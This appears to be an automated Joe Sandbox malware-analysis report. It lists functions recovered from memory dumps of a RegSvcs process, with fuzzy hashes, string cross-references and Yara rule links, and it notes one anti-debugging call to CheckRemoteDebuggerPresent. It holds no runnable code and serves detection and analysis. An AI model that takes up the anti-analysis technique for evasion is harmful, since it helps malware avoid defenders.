Function 00A73363 Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b50120e1461b04452f01d5c0303b25f7f8585495e11048a5c35b39f2de61964
Instruction ID: cfa4ab7097502651554c1720dce3d8690326c958a4928ade8cc87f59f40de091
Opcode Fuzzy Hash: 0b50120e1461b04452f01d5c0303b25f7f8585495e11048a5c35b39f2de61964
Instruction Fuzzy Hash: 86B1D273A0A140DFDF249724CC1477A7BB2AB41311F2BC4B6D45A8F292D674DE82B752

Uniqueness

Uniqueness Score: -1.00%

Function 00A7DC00 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1e66ca8f1ec1639c543cadf58b8a2d6c5b1b76935a218cf652c04be632e8839
Instruction ID: 41bcdfe92c1f007a2f829b28970ab10fceef498a1d826ff5d4181d1eb5976e0f
Opcode Fuzzy Hash: d1e66ca8f1ec1639c543cadf58b8a2d6c5b1b76935a218cf652c04be632e8839
Instruction Fuzzy Hash: F1B13C70E00209CFDF15DFA9CD857AEBBF2AF88314F14C129D819AB254EB759845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A7E4D0 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 019767823d806a626fc7214dfaf708ce35ba52e7097922f84ce7cffd37e73ad2
Instruction ID: 7aee7c12b60e9b145d2277ef33987c88d1ea86eca782f6df98c92d7b8eae7060
Opcode Fuzzy Hash: 019767823d806a626fc7214dfaf708ce35ba52e7097922f84ce7cffd37e73ad2
Instruction Fuzzy Hash: 05B15B70E002098FDF14CFA9CD8579EBBF2AF88714F24C569E419E7294EB749845CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00A7D8B8 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d1a8e7813569a2863966ae0514c47171356fcfe61d85f434b040270356413f1
Instruction ID: 9d70f14e9fe1f3494453613bca7e9f048c7dcef260f1b36ebecb4fd8ae915e9f
Opcode Fuzzy Hash: 3d1a8e7813569a2863966ae0514c47171356fcfe61d85f434b040270356413f1
Instruction Fuzzy Hash: 67916CB1E00209DFDF14DFA9C9817AEBBF2BF88354F14C129E419A7294EB749945CB81

Uniqueness

Uniqueness Score: -1.00%

Function 06705E6E Relevance: 22.9, Strings: 18, Instructions: 446
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Obq, xrefs: 06706441
=H), xrefs: 0670639B
\Obq, xrefs: 06706451
XPbq, xrefs: 06706160
fbq, xrefs: 067077E8
fbq, xrefs: 06707918
:H), xrefs: 0670619A
\Obq, xrefs: 067063EB
XPbq, xrefs: 06706260
fbq, xrefs: 067064A0
\Obq, xrefs: 0670634B
XPbq, xrefs: 06706209
XPbq, xrefs: 0670614A
\Obq, xrefs: 06706361
fbq, xrefs: 067077D2
XPbq, xrefs: 067061F3
fbq, xrefs: 067064B6
9\r, xrefs: 06705E7B

Memory Dump Source

Source File: 00000005.00000002.3307649124.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID: fbq$ fbq$ fbq$ fbq$ fbq$9\r$:H)$=H)$XPbq$XPbq$XPbq$XPbq$XPbq$\Obq$\Obq$\Obq$\Obq$\Obq
API String ID: 0-1723862778
Opcode ID: 0640d1a4716f330d48941d0037dc1188ef187cb9c07d18377a7ab7575b2fa9a6
Instruction ID: 0dbb5ee73a33d837d3e8928ffc9e29fece8085d652ba9df6f012521787740cbb
Opcode Fuzzy Hash: 0640d1a4716f330d48941d0037dc1188ef187cb9c07d18377a7ab7575b2fa9a6
Instruction Fuzzy Hash: 26125970A40219DFEBA4DF58C961BE9B7F2BB44310F1081A5E509AB3C5DB709E81CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 067A6400 Relevance: 18.1, Strings: 14, Instructions: 581COMMON

Download Yara Rule

Strings

$]q, xrefs: 067A7398
$]q, xrefs: 067A7353
$]q, xrefs: 067A7046
$]q, xrefs: 067A74E3
]Yr, xrefs: 067A6FF8
$]q, xrefs: 067A74F1
$]q, xrefs: 067A7382
$]q, xrefs: 067A7023
$]q, xrefs: 067A71D6
$]q, xrefs: 067A7494
$]q, xrefs: 067A7156
$]q, xrefs: 067A71C0
$]q, xrefs: 067A7140
$]q, xrefs: 067A72AA

Memory Dump Source

Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: ]Yr$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-2105319476
Opcode ID: 34d0e111698533dc683423dbbbf4b8a4d75c001551b6351eb1f7e2cce61b87a3
Instruction ID: 72095336ea352ffafced209f9027d767ea9785fff816b624292d6c28efad3af4
Opcode Fuzzy Hash: 34d0e111698533dc683423dbbbf4b8a4d75c001551b6351eb1f7e2cce61b87a3
Instruction Fuzzy Hash: C0325F34A04318CFEBA8CB68C945BADB7B2FBC4301F14C6A6E509AB255D7359E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 06702535 Relevance: 16.5, Strings: 13, Instructions: 285
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 0670283B
ZYr, xrefs: 06702733
$]q, xrefs: 0670256E
$]q, xrefs: 0670265D
$]q, xrefs: 06702753
fbq, xrefs: 06702865
$]q, xrefs: 067027D7
$]q, xrefs: 06702769
`OW, xrefs: 067025C3
$]q, xrefs: 067026DD
yM), xrefs: 06702875
$]q, xrefs: 067026F3
$]q, xrefs: 06702584

Memory Dump Source

Source File: 00000005.00000002.3307649124.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID: fbq$ZYr$`OW$yM)$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3639463074
Opcode ID: 2c33227e4d5f9d8c9941f6a538e1abf6a1ecf29afc610bfadc5e235436dba913
Instruction ID: 36dde26b891ff891db2143af8844081a3513f012de8433c698555faca93c0f21
Opcode Fuzzy Hash: 2c33227e4d5f9d8c9941f6a538e1abf6a1ecf29afc610bfadc5e235436dba913
Instruction Fuzzy Hash: DDC19035F00218CFFB649B64C958B6977F2AB84700F5084A5D95AAB3C5DB349E81CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0679EB30 Relevance: 12.8, Strings: 10, Instructions: 271
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 0679F26A
PH]q, xrefs: 0679F602
$]q, xrefs: 0679EE94
PH]q, xrefs: 0679F635
`Q]q, xrefs: 0679F9B3
PH]q, xrefs: 0679F406
PH]q, xrefs: 0679F435
PH]q, xrefs: 0679F5F2
$]q, xrefs: 0679F45D
PH]q, xrefs: 0679F3F6

Memory Dump Source

Source File: 00000005.00000002.3310908949.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6790000_RegSvcs.jbxd

Similarity

API ID:
String ID: PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$`Q]q$$]q$$]q$$]q
API String ID: 0-2063487809
Opcode ID: 1ad3fe9fbe6543eb76aee3e7e35b1bceee154abffb41ca1a82ca17011b228591
Instruction ID: 5587dd65716b41a762102584c1075fcb4f4d7b1aaf1996d2db3743d24aeeb7fa
Opcode Fuzzy Hash: 1ad3fe9fbe6543eb76aee3e7e35b1bceee154abffb41ca1a82ca17011b228591
Instruction Fuzzy Hash: 21B18D30E00254CFEF94CBA8E854AB97BF2AF45304F14C56AE4169B395DB74D885CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06700926 Relevance: 10.4, Strings: 8, Instructions: 368
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

SYr, xrefs: 06700AB3
$]q, xrefs: 06700B6B
$]q, xrefs: 06700C08
$]q, xrefs: 06700B5D
$]q, xrefs: 06700AC9
$]q, xrefs: 06700C16
$]q, xrefs: 06700C7B
$]q, xrefs: 06700BAB

Memory Dump Source

Source File: 00000005.00000002.3307649124.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID: SYr$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-563465331
Opcode ID: 5787ccc6b8dc4e1a7e6cb4bb7e14d8ae167347db2e06a5124462221a9369d96f
Instruction ID: 5ec1366d66880111f686d0bbead5ea0ec4dfa9f0b20ca4fe457e273b18024f31
Opcode Fuzzy Hash: 5787ccc6b8dc4e1a7e6cb4bb7e14d8ae167347db2e06a5124462221a9369d96f
Instruction Fuzzy Hash: 94D1E130F04204CFF7948B68D950B7A7BE2EB46721F28C166E5599B2D2D678EC41CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 06704840 Relevance: 9.1, Strings: 7, Instructions: 372COMMON

Download Yara Rule

Strings

$]q, xrefs: 06705106
\Obq, xrefs: 06704C50
\Obq, xrefs: 06704C40
$]q, xrefs: 06705112
\Obq, xrefs: 06704BD3
\Obq, xrefs: 06704B8C
\Obq, xrefs: 06704C27

Memory Dump Source

Source File: 00000005.00000002.3307649124.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID: \Obq$\Obq$\Obq$\Obq$\Obq$$]q$$]q
API String ID: 0-1179055013
Opcode ID: 04e6847c5be210703d7b4c019cbc25afcaac08453c49190944354c49fca0bdb4
Instruction ID: 57e12765648bd35755125a9bf67e8abf6d00d778d2925a093b627e0b48cc1a3d
Opcode Fuzzy Hash: 04e6847c5be210703d7b4c019cbc25afcaac08453c49190944354c49fca0bdb4
Instruction Fuzzy Hash: 72D1C270D05155CFF794CFB8C90466AB7FAAF82341F18816AD6129B2E9C774A841CFB1

Uniqueness

Uniqueness Score: -1.00%

Function 067A8489 Relevance: 8.0, Strings: 6, Instructions: 513COMMON

Download Yara Rule

Strings

$]q, xrefs: 067A8788
$]q, xrefs: 067A8A26
$]q, xrefs: 067A8959
$]q, xrefs: 067A8634
$]q, xrefs: 067A8794
$]q, xrefs: 067A8943

Memory Dump Source

Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3723351465
Opcode ID: 8fb5ba53b554f46c820d4dc991a868cf1acdca580a9385724b1ffa26c74d1d9a
Instruction ID: a39d2d1da04e5a17a02eeba7bbf5e120157529e040d9efe3c3b3f647b0bf66c5
Opcode Fuzzy Hash: 8fb5ba53b554f46c820d4dc991a868cf1acdca580a9385724b1ffa26c74d1d9a
Instruction Fuzzy Hash: B9224D30E00229CFDBA8CF58C955BE9B7B2BF84301F1486D5D619AB295C7749E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0679247D Relevance: 6.6, Strings: 5, Instructions: 300
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06792618
$]q, xrefs: 067927B7
$]q, xrefs: 06792A13
$]q, xrefs: 0679249F
$]q, xrefs: 067927C3

Memory Dump Source

Source File: 00000005.00000002.3310908949.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6790000_RegSvcs.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q
API String ID: 0-477462128
Opcode ID: 14f84a93b731c858bda7a3206a9fb3c02fdeb24eb02f94ae63ff411229cd2caf
Instruction ID: 1e8ef2a401c419c73d1b02d00e2a2de289cf29af7cbd58ffe66bc574efe74d16
Opcode Fuzzy Hash: 14f84a93b731c858bda7a3206a9fb3c02fdeb24eb02f94ae63ff411229cd2caf
Instruction Fuzzy Hash: 3EC13030A14118DFEFA4EBA8E554BAD77F1BF40301F208569D426AB696C7349E41CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 068AF4D0 Relevance: 5.3, Strings: 4, Instructions: 304
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH]q, xrefs: 068AF74B
PH]q, xrefs: 068AF716
PH]q, xrefs: 068AF735
w[r, xrefs: 068AF538

Memory Dump Source

Source File: 00000005.00000002.3313747501.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_68a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: PH]q$PH]q$PH]q$w[r
API String ID: 0-3187754680
Opcode ID: 68c2bb37beda84113a275067086aaa3eb8cec9bdaef7f44238d2339b959123e2
Instruction ID: 5f55300168683552d0a67d564924e9af3ba3282ec5e814019ea4e7967af2ee93
Opcode Fuzzy Hash: 68c2bb37beda84113a275067086aaa3eb8cec9bdaef7f44238d2339b959123e2
Instruction Fuzzy Hash: 24B1C230B44349EFFB949F64C952B7E76A2EB84704F248025EF06EB394DA749C42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06700F48 Relevance: 5.2, Strings: 4, Instructions: 188
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 067010C0
$]q, xrefs: 067010D6
[r, xrefs: 06701023
$]q, xrefs: 067010E4

Memory Dump Source

Source File: 00000005.00000002.3307649124.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$[r
API String ID: 0-4217983697
Opcode ID: 443e11901054ca4bb76367eed368eb4afad056cdff855e047d612dd306274836
Instruction ID: b1d659a913720b1e285735ceefe5c165bc23a81dc0b480eaddfdd0fa3bee8260
Opcode Fuzzy Hash: 443e11901054ca4bb76367eed368eb4afad056cdff855e047d612dd306274836
Instruction Fuzzy Hash: A151A130B44104DFF7989BA8D844BBD76E7EB94310F54C03AE50AAB3C5DA759C418BA1

Uniqueness

Uniqueness Score: -1.00%

Function 06700F39 Relevance: 3.9, Strings: 3, Instructions: 176
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 067010C0
$]q, xrefs: 067010D6
[r, xrefs: 06701023

Memory Dump Source

Source File: 00000005.00000002.3307649124.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID: $]q$$]q$[r
API String ID: 0-377108751
Opcode ID: 4cf494f9e09bb60f79f53dc1b39de31684049bf25712cc301b1e9b3370c00087
Instruction ID: c6731c555932aba0da14506fbc7491f608204e7ec1d9aecff9ac200aca97259b
Opcode Fuzzy Hash: 4cf494f9e09bb60f79f53dc1b39de31684049bf25712cc301b1e9b3370c00087
Instruction Fuzzy Hash: B251A030F44144DFFB949BA8D844BB9B6E7EB94311F54C03AE50AAB3C1DA74AC418BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A790B8 Relevance: 2.8, Strings: 2, Instructions: 266
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 00A791A4
$]q, xrefs: 00A79194

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: 94f85bbd31796471caec81a5a00876ebadecf5b6bb54410d2e5f48b8d3163c55
Instruction ID: 6e8f1d1ade75b4902fb993013def35aaf22fad0d03e78b9813cc355d4a3d600c
Opcode Fuzzy Hash: 94f85bbd31796471caec81a5a00876ebadecf5b6bb54410d2e5f48b8d3163c55
Instruction Fuzzy Hash: 0A91D13464A145DFD7058B78CDA96AF7BB2BB45300F64C1BBD80A9B6C2C7348887DB52

Uniqueness

Uniqueness Score: -1.00%

Function 067A4C8D Relevance: 2.6, Strings: 2, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`Q]q, xrefs: 067A4C96
$]q, xrefs: 067A4A19

Memory Dump Source

Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: `Q]q$$]q
API String ID: 0-945736792
Opcode ID: 21557298d60a85fcf1c725e2bf8b58905c8ea09aa46525638a524849414e4348
Instruction ID: 46431bb71ebd13f5714f5d214e3ec5918592685f63fed3205c997b1bf01993c1
Opcode Fuzzy Hash: 21557298d60a85fcf1c725e2bf8b58905c8ea09aa46525638a524849414e4348
Instruction Fuzzy Hash: E8511730E00228DFEBA4CF54C984BEDB7F2BB84300F1486A9D549AB298D7719E80CF51

Uniqueness

Uniqueness Score: -1.00%

Function 067A2DFD Relevance: 2.5, Strings: 2, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.5uq, xrefs: 067A2E00
.]r, xrefs: 067A2E1D

Memory Dump Source

Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: .5uq$.]r
API String ID: 0-2194674112
Opcode ID: 1ffa34dc42a9d7a0b69093399bcb9668cd1f14a14e165914510d575f245e88fc
Instruction ID: 9d40685002f67ffc1ef56de88e7204ea2d88f07528e1d3163e0fa9d7c8276d70
Opcode Fuzzy Hash: 1ffa34dc42a9d7a0b69093399bcb9668cd1f14a14e165914510d575f245e88fc
Instruction Fuzzy Hash: B9118E30E002188FDB50CB64C954BEDBBF2EF88301F248195E449BB255CB719E80CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0679313F Relevance: 2.5, Strings: 2, Instructions: 30COMMON

Download Yara Rule

Strings

$]q, xrefs: 06793161
$]q, xrefs: 06793151

Memory Dump Source

Source File: 00000005.00000002.3310908949.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6790000_RegSvcs.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: b704fc3fabd7d88c12d45e7715045df7b0980ef9208d27c380574058e5e4795a
Instruction ID: 0dd67d4df68d12cc10d7c16d0e27db24a92a4a67ffa814963b309d29ad67eed9
Opcode Fuzzy Hash: b704fc3fabd7d88c12d45e7715045df7b0980ef9208d27c380574058e5e4795a
Instruction Fuzzy Hash: ECF09030E80548DFDF98DB98E844BBD73F2BB01711F14C052E5656B2A9CB389C01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 067A2F0E Relevance: 2.5, Strings: 2, Instructions: 24COMMON

Download Yara Rule

Strings

.5uq, xrefs: 067A2F11
aOW, xrefs: 067A2F35

Memory Dump Source

Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: .5uq$aOW
API String ID: 0-3017703097
Opcode ID: 35cc3c2af1d9c5a42f2b56e8909702282da86d11603ae19d27fb0db2f4ffaeb9
Instruction ID: c5528f40762c9ccd8c9809d44f83297ab444944155ae4ae002839a99d3168136
Opcode Fuzzy Hash: 35cc3c2af1d9c5a42f2b56e8909702282da86d11603ae19d27fb0db2f4ffaeb9
Instruction Fuzzy Hash: 9FF082B0A40218DFE760CB50CD51BED77B2BB88700F20C199A58D6B395CAB45D80CF40

Uniqueness

Uniqueness Score: -1.00%

Function 067A2D88 Relevance: 2.5, Strings: 2, Instructions: 24COMMON

Download Yara Rule

Strings

kO), xrefs: 067A2DAA
.5uq, xrefs: 067A2D8B

Memory Dump Source

Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: .5uq$kO)
API String ID: 0-1004324481
Opcode ID: a8ccd096e522fbd084656f278f7af44cbd97f195877bbab5ef7cfd212ad7f7e5
Instruction ID: 7cc98ad1ca1489e4b08dd62779c5d3b5e056a35aba6c5d39f3b36901e288ad29
Opcode Fuzzy Hash: a8ccd096e522fbd084656f278f7af44cbd97f195877bbab5ef7cfd212ad7f7e5
Instruction Fuzzy Hash: 9FF05E70F403189FEB64CF50CD82BEAB676BB88700F104099A509A7289CAB05E81CF91

Uniqueness

Uniqueness Score: -1.00%

Function 067A4855 Relevance: 1.6, Strings: 1, Instructions: 396COMMON

Download Yara Rule

Strings

$]q, xrefs: 067A4A19

Memory Dump Source

Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $]q
API String ID: 0-1007455737
Opcode ID: 507f151fd768e3ae04b0cc984bd3866f31f538af47b874418e78f1392a6a5b7e
Instruction ID: 356b1a84b9b3b4f74429d77e370c039f54b88fcd8a3bd48eec97111a23096b2e
Opcode Fuzzy Hash: 507f151fd768e3ae04b0cc984bd3866f31f538af47b874418e78f1392a6a5b7e
Instruction Fuzzy Hash: 49121B70D00229CFEBA4CF68C944BEDB7B2BF84301F1486A6D559AB295D7709E80CF51

Uniqueness

Uniqueness Score: -1.00%

Function 04D3A6A8 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 04D3A727

Memory Dump Source

Source File: 00000005.00000002.3298316044.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4d30000_RegSvcs.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: bec2476a113151f73b9c195f108ed1156167d7626c7bba21788bf2f7a2bd8068
Instruction ID: dc04c9cf4b85b724559e5e64461cbf6fb5062b7dc39dbd436bc5903c2ac3c810
Opcode Fuzzy Hash: bec2476a113151f73b9c195f108ed1156167d7626c7bba21788bf2f7a2bd8068
Instruction Fuzzy Hash: 712136B19002598FDB10CF9AD484BEEBBF4FF49320F14841AE859A7350C738A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 067A504C Relevance: 1.5, Strings: 1, Instructions: 266COMMON

Download Yara Rule

Strings

$]q, xrefs: 067A4A19

Memory Dump Source

Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $]q
API String ID: 0-1007455737
Opcode ID: e37bffd16dd76fd27de1e499620fa979bbd5fe850d17cea480bfb3d31eb4f897
Instruction ID: 3a80d86059144b4223ebfd87418c986db288104bd9e08d74d34bcca6ee110dd1
Opcode Fuzzy Hash: e37bffd16dd76fd27de1e499620fa979bbd5fe850d17cea480bfb3d31eb4f897
Instruction Fuzzy Hash: 5CC11A70D00229CFEBA4CF58C984BADB7F2BB84301F1486E6D51AAB295D7709E80CF55

Uniqueness

Uniqueness Score: -1.00%

Function 067A4E16 Relevance: 1.5, Strings: 1, Instructions: 241COMMON

Download Yara Rule

Strings

$]q, xrefs: 067A4A19

Memory Dump Source

Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $]q
API String ID: 0-1007455737
Opcode ID: 1ebf83a77452db1d6117ec465a36b189b0bfef5213a4442d4445023801eaa9fc
Instruction ID: 3b1740607b6583fee0ccd5c80923efc1451f4c95f894bf66f4d50c5db7545b69
Opcode Fuzzy Hash: 1ebf83a77452db1d6117ec465a36b189b0bfef5213a4442d4445023801eaa9fc
Instruction Fuzzy Hash: 72B11830E00229CFEBA4CF58C984BADB7B2BF84301F148696D519AB295D7709E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 067A50C0 Relevance: 1.5, Strings: 1, Instructions: 203COMMON

Download Yara Rule

Strings

$]q, xrefs: 067A4A19

Memory Dump Source

Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $]q
API String ID: 0-1007455737
Opcode ID: 4ef8847c01e96ea30539e837beafc0e9f23faf55bf8cf0b5c9ad01d5e6fa2e0c
Instruction ID: ee6a14e1b4625a4924d2aa1dc8c3bc66da79fefc0b5915db3916d603fee283d0
Opcode Fuzzy Hash: 4ef8847c01e96ea30539e837beafc0e9f23faf55bf8cf0b5c9ad01d5e6fa2e0c
Instruction Fuzzy Hash: E2910870900229DFEBA4DF64C944BEDB7F2BB88300F1482A9D549A7295D7709E80CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00A79110 Relevance: 1.4, Strings: 1, Instructions: 178COMMON

Download Yara Rule

Strings

$]q, xrefs: 00A79194

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID: $]q
API String ID: 0-1007455737
Opcode ID: 0e28fc1df1d36a374aa0c67c1fc7b8922001f2df06a19f8d426e380117f5c383
Instruction ID: 3ac0681d0e5439f4eccc40c9078505236066509d8fb0d30354c30b73d9c0c816
Opcode Fuzzy Hash: 0e28fc1df1d36a374aa0c67c1fc7b8922001f2df06a19f8d426e380117f5c383
Instruction Fuzzy Hash: 48619D30A09101CBDB548B68DD98ABF76B2FB85305FA4C66BD41EAB295C7348C81EB51

Uniqueness

Uniqueness Score: -1.00%

Function 06776CC0 Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

JXr, xrefs: 06776F11

Memory Dump Source

Source File: 00000005.00000002.3310174991.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6770000_RegSvcs.jbxd

Similarity

API ID:
String ID: JXr
API String ID: 0-3088851973
Opcode ID: 26301cf9e280f653edf3552caecd992ed20a34bfd47789d0db26c30ca5cfe418
Instruction ID: a372b940a4e230a8ec9fea9a3a4cd46d10a8580bfa0816315fda27231cf1d25b
Opcode Fuzzy Hash: 26301cf9e280f653edf3552caecd992ed20a34bfd47789d0db26c30ca5cfe418
Instruction Fuzzy Hash: 5861AF71E04A59CFDF90CB68C884BA9BBF1BF45300F15C166E546DB249E7B4D841CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A790B3 Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

$]q, xrefs: 00A79194

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID: $]q
API String ID: 0-1007455737
